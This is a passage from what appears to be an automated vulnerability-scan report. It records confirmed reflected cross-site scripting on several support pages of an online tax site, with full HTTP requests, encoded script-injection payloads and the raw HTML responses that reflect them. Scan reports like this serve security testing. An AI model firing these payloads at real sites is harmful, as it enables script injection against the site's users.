src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="form"><!-- Error message >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><br /><table cellpadding="2" cellspacing="0" border="0" width="100%"><tr><td colspan="2" class="subtitle">&nbsp;Account Creation Failed</td></tr><tr><td colspan="2" class="textcell"><table><tr><td class="textcell">Passwords must be at least 5 characters long.<br /></td></tr></table></td></tr><tr><td><font size="+1">&nbsp;</font></td></tr></table><table align="right"><tr><td><span class="smlabel"><font color="red">*</font> Denotes a required field.</span></td></tr></table><br /><table cellpadding="2" cellspacing="0" border=&qu..
- /cgi-bin/olt.cfg/php/enduser/acct_new_submit.php

/cgi-bin/olt.cfg/php/enduser/acct_new_submit.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_new_submit.php?p_sid=8D9NtJsk&p_lva=3&p_sp..

Parameters

Parameter Type Value
p_sid GET 8D9NtJsk
p_lva GET 3
p_sp GET 3
p_li GET 3
p_accessibility GET 3
p_redirect GET 3
p_countryid POST 3
p_email POST netsparker@example.com
p_email_alt1 POST netsparker@example.com
p_email_alt2 POST netsparker@example.com
p_first_name POST Smith
p_last_name POST Smith
p_next_page POST 3
p_passwd POST 3
p_passwd2 POST 3
p_ph_asst POST 3
p_ph_fax POST 3
p_ph_home POST 3
p_ph_mobile POST 3
p_ph_office POST 3
p_postal_number POST 3
p_provid POST 3
p_question POST 3
p_subject POST 3
p_token POST
p_userid POST '"--></style></script><script>alert(0x0014C8)</script>
submit_btn POST Create Account

Request

POST /cgi-bin/olt.cfg/php/enduser/acct_new_submit.php?p_sid=8D9NtJsk&p_lva=3&p_sp=3&p_li=3&p_accessibility=3&p_redirect=3 HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_new.php
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Content-Length: 448
Accept-Encoding: gzip, deflate

p_countryid=3&p_email=netsparker%40example.com&p_email_alt1=netsparker%40example.com&p_email_alt2=netsparker%40example.com&p_first_name=Smith&p_last_name=Smith&p_next_page=3&p_passwd=3&p_passwd2=3&p_ph_asst=3&p_ph_fax=3&p_ph_home=3&p_ph_mobile=3&p_ph_office=3&p_postal_number=3&p_provid=3&p_question=3&p_subject=3&p_token=&p_userid=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x0014C8)%3C%2Fscript%3E&submit_btn=Create+Account

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 23:10:14 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Fri, 29-Apr-2011 23:30:14 GMT
RNT-Time: D=219162 t=1304118614093758
RNT-Machine: 03
X-Cnection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Create a New Account</title><script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></script><script type="text/javascript"> // --------------------------------------------var _submit_accepted = false;var phone_numbers = new Array('', '', '', '', '');var p_postal_emask, p_postal_fstr, p_postal_dmask;var p_contact_phone_emask, p_contact_phone_fstr, p_contact_phone_dmask;var no_test = false, mask_str = null, cur_mask = null;var old_phone = 0;var postal_number = '';var submit_flag = true;// ----------------------------------------------------------------------------function _putCustomFieldMasks(formName){ for(i = 0; i < _fields.length; i++) if(_fields[i].name.match('_ccf_')) if(document[formName]['custom_text_' + _fields[i].name]) put_mask(_fields[i].name, document[formName]['custom_text_' + _fields[i].name].value, document[formName], 0); else if(document[formName]['custom_text_lh_' + _fields[i].name]) { put_mask(_fields[i].name, document[formName]['custom_text_lh_' + _fields[i].name].value, document[formName], 0); document.getElementById(_fields[i].name + '_mask').innerHTML=''; }}// ----------------------------------------------------------------------------function init(){}// ----------------------------------------------------------------------------function _do_submit(form){ var chk_val, ph_mask, pt_mask; var msgs = new Array( "The username you have entered contains spaces. Please try again.", "Username must not contain quote characters. Please try again.", "The passwords you have entered do not match.\n\nPlease re-enter them.", "Passwords must be at least 5 characters long."); if ((form.p_email.value != "") && (form.p_email.value == form.p_email_alt1.value || form.p_email.value == form.p_email_alt2.value || ((form.p_email_alt1.value != "") && (form.p_email_alt1.value == form.p_email_alt2.value)))) { alert("An email address must be unique across the Email Address, Email Alt 1, and Email Alt 2 fields."); return(false); } if (_submit_accepted) // prevents NN4 resubmission return(false); if (!_validate_acctinfo(form.p_userid, form.p_passwd, form.p_passwd2, 5, msgs)) return(false); chk_val = _check_fields(form.name, fld_data, _fields); form.submit_btn.disabled = chk_val; _submit_accepted = chk_val; if (!chk_val) return (false); return(chk_val);}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -function change_phone(num, sel_val){ phone_numbers[old_phone] = num.value; num.value = phone_numbers[sel_val]; old_phone = sel_val;}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -function reset_phone(){ document._main.p_contact_phone.value = ''; phone_numbers = ['', '', '', '', ''];}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -var _fields = new Array (new field('p_userid', "Username", 5, 80, 33),new field('p_passwd', "Password", 5, 0, 0),new field('p_email', "Email Address", 5, 0, 37),new field('p_email_alt1', "Email Address", 5, 0, 36),new field('p_email_alt2', "Email Address", 5, 0, 36),new field('p_first_name', "First Name", 5, 0, 33),new field('p_last_name', "Last Name", 5, 0, 33),new field('', '', 0, 0, 0));var fld_data = new field_data("is not an integer.","requires a value.","is not completely specified.","The text entered for \'%s\' exceeds its size limit of %d characters by %d characters.","must only contain valid ascii characters.","does not seem to be a valid email address.","Must contain valid furigana characters","Need to select more options.","Need to select fewer options.","Month","Day","Year","Hour","Minute","(([-!#$%&\'*+/=?^~`{|}\\w]+(\\.[-!#$%&\'*+/=?^~`{|}\\w]+)*)|(\"[^\"]+\"))@[0-9A-Za-z]+(-[0-9A-Za-z]+)*(\\.[0-9A-Za-z]+(-[0-9A-Za-z]+)*)+",0,2010,"must not contain either \'<\' or \'>\'","cannot be negative","Field contains too many characters.","Must contain a valid format character.","is not a valid format character.","Must contain a valid number.","is not a valid number.","Must contain a valid alpha-numeric.","is not a valid alpha-numeric.","Must contain a valid letter.","is not a valid letter.","Must contain a valid character.","is not a valid character.","The correct format is","The value you have entered is less than the smallest value allowed for this field.","The value you have entered is greater than the largest value allowed for this field.","is not a valid date.","is not a valid date. Please enter a date in format","MM","DD","YYYY","Minimum year is:","Maximum year is:");// ------------------------------------------------------------------ </script></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor" onLoad="_set_cursor(); init(); _putCustomFieldMasks('_main')"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><form class="block" name="_main" method="post" action="acct_new_submit.php?p_sid=loEm6Ksk&amp;p_lva=3&amp;p_sp=&amp;p_li=3&amp;p_accessibility=&amp;p_redirect=" onSubmit="return(_do_submit(this))"><input type="hidden" name="p_next_page" value="3" /><input type="hidden" name="p_countryid" value="3" /><input type="hidden" name="p_provid" value="3" /><input type="hidden" name="p_ph_office" value="3" /><input type="hidden" name="p_ph_mobile" value="3" /><input type="hidden" name="p_ph_fax" value="3" /><input type="hidden" name="p_ph_asst" value="3" /><input type="hidden" name="p_ph_home" value="3" /><input type="hidden" name="p_postal_number" value="3" /><input type="hidden" name="p_token" value="" /><input type="hidden" name="p_subject" value="3" /><input type="hidden" name="p_question" value="3" /><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=&p_sid=loEm6Ksk&amp;p_accessibility=3&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=&p_sid=loEm6Ksk&amp;p_accessibility=3&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=&p_sid=loEm6Ksk&amp;p_accessibility=3&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=&p_sid=loEm6Ksk&amp;p_accessibility=3&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="10"> &nbsp; </td> </tr> <tr><td colspan="8"></td></tr> <tr><td colspan="8"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td><td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td></tr><tr><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="form"><!-- Error message >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><br /><table cellpadding="2" cellspacing="0" border="0" width="100%"><tr><td colspan="2" class="subtitle">&nbsp;Account Creation Failed</td></tr><tr><td colspan="2" class="textcell"><table><tr><td class="textcell">Username must not contain quote characters. Please try again.<br />Passwords must be at least 5 characters long.<br /></td></tr></table></td></tr><tr><td><font size="+1">&nbsp;</font></td></tr></table><table align="right"><tr><td><span class="smlabel"><font color="red">*</font> Denotes a required field.</span></td></tr></table><br />..
- /cgi-bin/olt.cfg/php/enduser/help_general.php

/cgi-bin/olt.cfg/php/enduser/help_general.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/help_general.php?OLTSite=OLTFree%0073541%00%27%..

Parameters

Parameter Type Value
OLTSite GET OLTFree73541'"--></style></script><script>alert(0x001D8A)</script>
p_sid GET TyYLtJsk
p_accessibility GET 1
p_redirect GET 3
p_depth GET 1

Request

GET /cgi-bin/olt.cfg/php/enduser/help_general.php?OLTSite=OLTFree%0073541%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x001D8A)%3C%2Fscript%3E&p_sid=TyYLtJsk&p_accessibility=1&p_redirect=3&p_depth=1 HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/help_general.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_accessibility=1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 23:55:36 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=202871 t=1304121336714103
RNT-Machine: 01
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4021
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Support Help</title></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x001D8A)%5C/script%5E&p_sid=T6f_gKsk&amp;p_accessibility=1&amp;p_redirect=3">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x001D8A)%5C/script%5E&p_sid=T6f_gKsk&amp;p_accessibility=1&amp;p_redirect=3">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x001D8A)%5C/script%5E&p_sid=T6f_gKsk&amp;p_accessibility=1&amp;p_redirect=3">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x001D8A)%5C/script%5E&p_sid=T6f_gKsk&amp;p_accessibility=1&amp;p_redirect=3">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> <td width="1%" valign="bottom"> <table width="1%" cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1%" class="seltabbtn" align="left" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> <td width="2%" name="_tab" class="seltabbtn" align="center" valign="middle" nowrap rowspan="2"> <a class="seltabbtn" href="help_general.php?OLTSite=OLTFree73541'"--></style></script><script>netsparker(0x001D8A)</script>&p_sid=T6f_gKsk&amp;p_accessibility=1&amp;p_redirect=3"> &nbsp;&nbsp;Help&nbsp;&nbsp; </a> </td> <td width="1%" class="seltabbtn" align="right" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> </tr> <tr> <td class="seltabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> <td class="seltabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> </tr> </table> </td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="11"> <table cellpadding="0" cellspacing="4" border="0" width="100%"> <tr> <td class="subtabarea" align="center" width="50%"> <table cellpadding="0" cellspacing="0" border="0" width="60%"> <tr> <td align="right" rowspan="3"><img height="19" width="8" src="/rnt/rnw/img/enduser/stinl.gif" alt="" /></td> <td bgcolor="black"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="2" alt="" /></td> <td align="left" rowspan="3"><img height="19" width="8" src="/rnt/rnw/img/enduser/stinr.gif" alt="" /></td> </tr> <tr> <td class="subtabbtn" name="general_help_tab_bar_btn" align="center" nowrap><a class="selsubtab" href="help_general.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x001D8A)%5C/script%5E&p_sid=T6f_gKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_depth=2">General Help</a></td> </tr> <tr> <td bgcolor="white"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="2" alt="" /></td> </tr> </table> </td> <td class="subtabarea" align="center" width="50%"> <table cellpadding="0" cellspacing="0" border="0" width="60%"> <tr> <td align="right" rowspan="3"><img height="19" width="8" src="/rnt/rnw/img/enduser/stoutl.gif" alt="" /></td> <td bgcolor="white"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="2" alt="" /></td> <td align="left" rowspan="3"><img height="19" width="8" src="/rnt/rnw/img/enduser/stoutr.gif" alt="" /></td> </tr> <tr> <td class="subtabbtn" name="search_tips_tab_bar_btn" align="center" nowrap><a class="subtab" href="help_search.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x001D8A)%5C/script%5E&p_sid=T6f_gKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_depth=2">Search Tips</a></td> </tr> <tr> <td bgcolor="black"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="2" alt="" /></td> </tr> </table> </td> </tr> </table> </td> </tr> <tr><td colspan="10"></td></tr> <tr><td colspan="10"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table><!-- Top border ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td><td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td></tr><!-- Help Text ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><tr><td class="form" align="right" rowspan="2"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="hcell"><span class="smtext">As you search for answers to your questions, you can easily move from one function to another using the tabs on the tab bar. <b>Be aware that you must have a customer account to access certain functions.</b><br><br>Note: This site contains the Accessible Links function in compliance with Section 508 of the Rehabilitation Act. It can be activated using accessibility software, such as a screen reader, or through this keystroke sequence: From a page other than Support Home, press <b>Tab</b> until the focus is on the My Stuff tab. Press <b>Tab</b> again and then press <b>Enter</b>.</span></td><td class="form" align="right" rowspan="2"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td></tr><tr><td class="form" align="right" ><img height="12" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td></tr><!-- Answers ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><tr><td class="form" align="right" rowspan="2"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="bar"><h2 class="subtitle" >&nbsp;Answers</h2></td><td class="form" align="right" rowspan="2"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td></tr><tr><td class="hcell"> <span class="smtext">Click this tab to search the knowledge base and view answers. Click a subject link to view the details of an answer. </span></td></tr><tr><td class="form" align="right" rowspan="2"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><th class="subheading"><br />Search</th><td class="form" align="right" rowspan="2"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td></tr..
- /cgi-bin/olt.cfg/php/enduser/help_search.php

/cgi-bin/olt.cfg/php/enduser/help_search.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/help_search.php?OLTSite=OLTFree%0073541%00%27%2..

Parameters

Parameter Type Value
OLTSite GET OLTFree73541'"--></style></script><script>alert(0x001DF6)</script>
p_sid GET TyYLtJsk
p_accessibility GET 1
p_redirect GET 3
p_depth GET 1

Request

GET /cgi-bin/olt.cfg/php/enduser/help_search.php?OLTSite=OLTFree%0073541%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x001DF6)%3C%2Fscript%3E&p_sid=TyYLtJsk&p_accessibility=1&p_redirect=3&p_depth=1 HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/help_general.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_accessibility=1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
